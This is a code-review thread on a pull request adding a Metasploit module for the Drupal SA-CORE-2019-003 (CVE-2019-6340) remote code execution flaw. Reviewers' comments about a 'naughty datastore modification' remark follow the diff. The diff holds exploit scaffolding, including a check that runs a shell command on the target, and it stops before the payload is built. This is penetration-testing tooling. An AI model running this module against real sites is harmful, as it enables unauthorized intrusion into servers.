modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb

```diff
@@ -0,0 +1,178 @@
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  # At the moment only targeting node's rest endpoint and hal_json format
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HTTP::Drupal
+  # XXX: CmdStager can't handle badchars
+  include Msf::Exploit::PhpEXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Drupal SA-CORE-2019-003 RestWS Remote PHP Code Execution',
+      'Description'    => %q{
+        This module exploits a Drupal RESTful Web Services RCE.
+
+        Drupal < 8.5.11, and < 8.6.10 are vulnerable.
+      },
+      'Author'         => [
+        'Samuel Mortenson', # Vulnerability discovery
+        'Charles Fol',      # Proof of concept (Drupal 8.x)
+        'Rotem Reiss',      # Metasploit module
+        'wvu'				# Author of the drupal_drupalgeddon2 Metasploit module which was used as the base for this module
+      ],
+      'References'     => [
+        ['CVE', '2019-6340'],
+        ['URL', 'https://www.drupal.org/sa-core-2019-003'],
+        ['URL', 'https://www.ambionics.io/blog/drupal8-rce']
+      ],
+      'DisclosureDate' => '2019-02-20',
+      'License'        => MSF_LICENSE,
+      'Platform'       => ['php', 'unix', 'linux'],
+      'Arch'           => [ARCH_PHP, ARCH_CMD, ARCH_X86, ARCH_X64],
+      'Privileged'     => false,
+      'Payload'        => {'BadChars' => '&>\''},
+      'Targets'        => [ ['Automatic', {}] ],
+      'DefaultTarget'  => 0, # Automatic (PHP In-Memory)
+      'DefaultOptions' => {'WfsDelay' => 2},
+      'Notes'          => {'AKA' => ['SA-CORE-2019-003', 'CVE-2019-6340']}
+    ))
+
+    register_options([
+      OptBool.new('DUMP_OUTPUT', [false, 'If output should be dumped', false])
+    ])
+
+    register_advanced_options([
+      OptBool.new('ForceExploit',  [false, 'Override check result', false]),
+      OptString.new('WritableDir', [true, 'Writable dir for droppers', '/tmp'])
+    ])
+  end
+
+  def check
+    checkcode = CheckCode::Safe
+
+    @version = target['Version'] || drupal_version
+
+    if @version && @version.to_s =~ /^8\b/
+      print_status("Drupal #{@version} targeted at #{full_uri}")
+      checkcode = CheckCode::Detected
+    else
+      print_error('Could not determine Drupal version to target')
+      return CheckCode::Unknown
+    end
+
+    token = random_crap
+    res   = execute_command("printf #{token}")
+
+    if res && res.body.end_with?(token)
+      checkcode = CheckCode::Vulnerable
+    end
+
+    checkcode
+  end
+
+  def exploit
+    if check == CheckCode::Safe && datastore['ForceExploit'] == false
+      fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
+    end
+
+    unless @version
+      print_warning('Targeting Drupal 8.x')
+      @version = Gem::Version.new('8')
+    end
+
+    if datastore['PAYLOAD'] == 'cmd/unix/generic'
+      print_warning('Enabling DUMP_OUTPUT for cmd/unix/generic')
+      # XXX: Naughty datastore modification
```

Comment:
.

Reply:
.

Reply:
Can any of you explain :fearful: ? Should it be removed? what about the main Payload definition? Is that ok? Not sure I understand the explanation at https://www.offensive-security.com/metasploit-unleashed/exploit-payloads/

Reply:
It's just a sarcastic comment to suggest that modifying datastore options on the fly is potentially unsafe.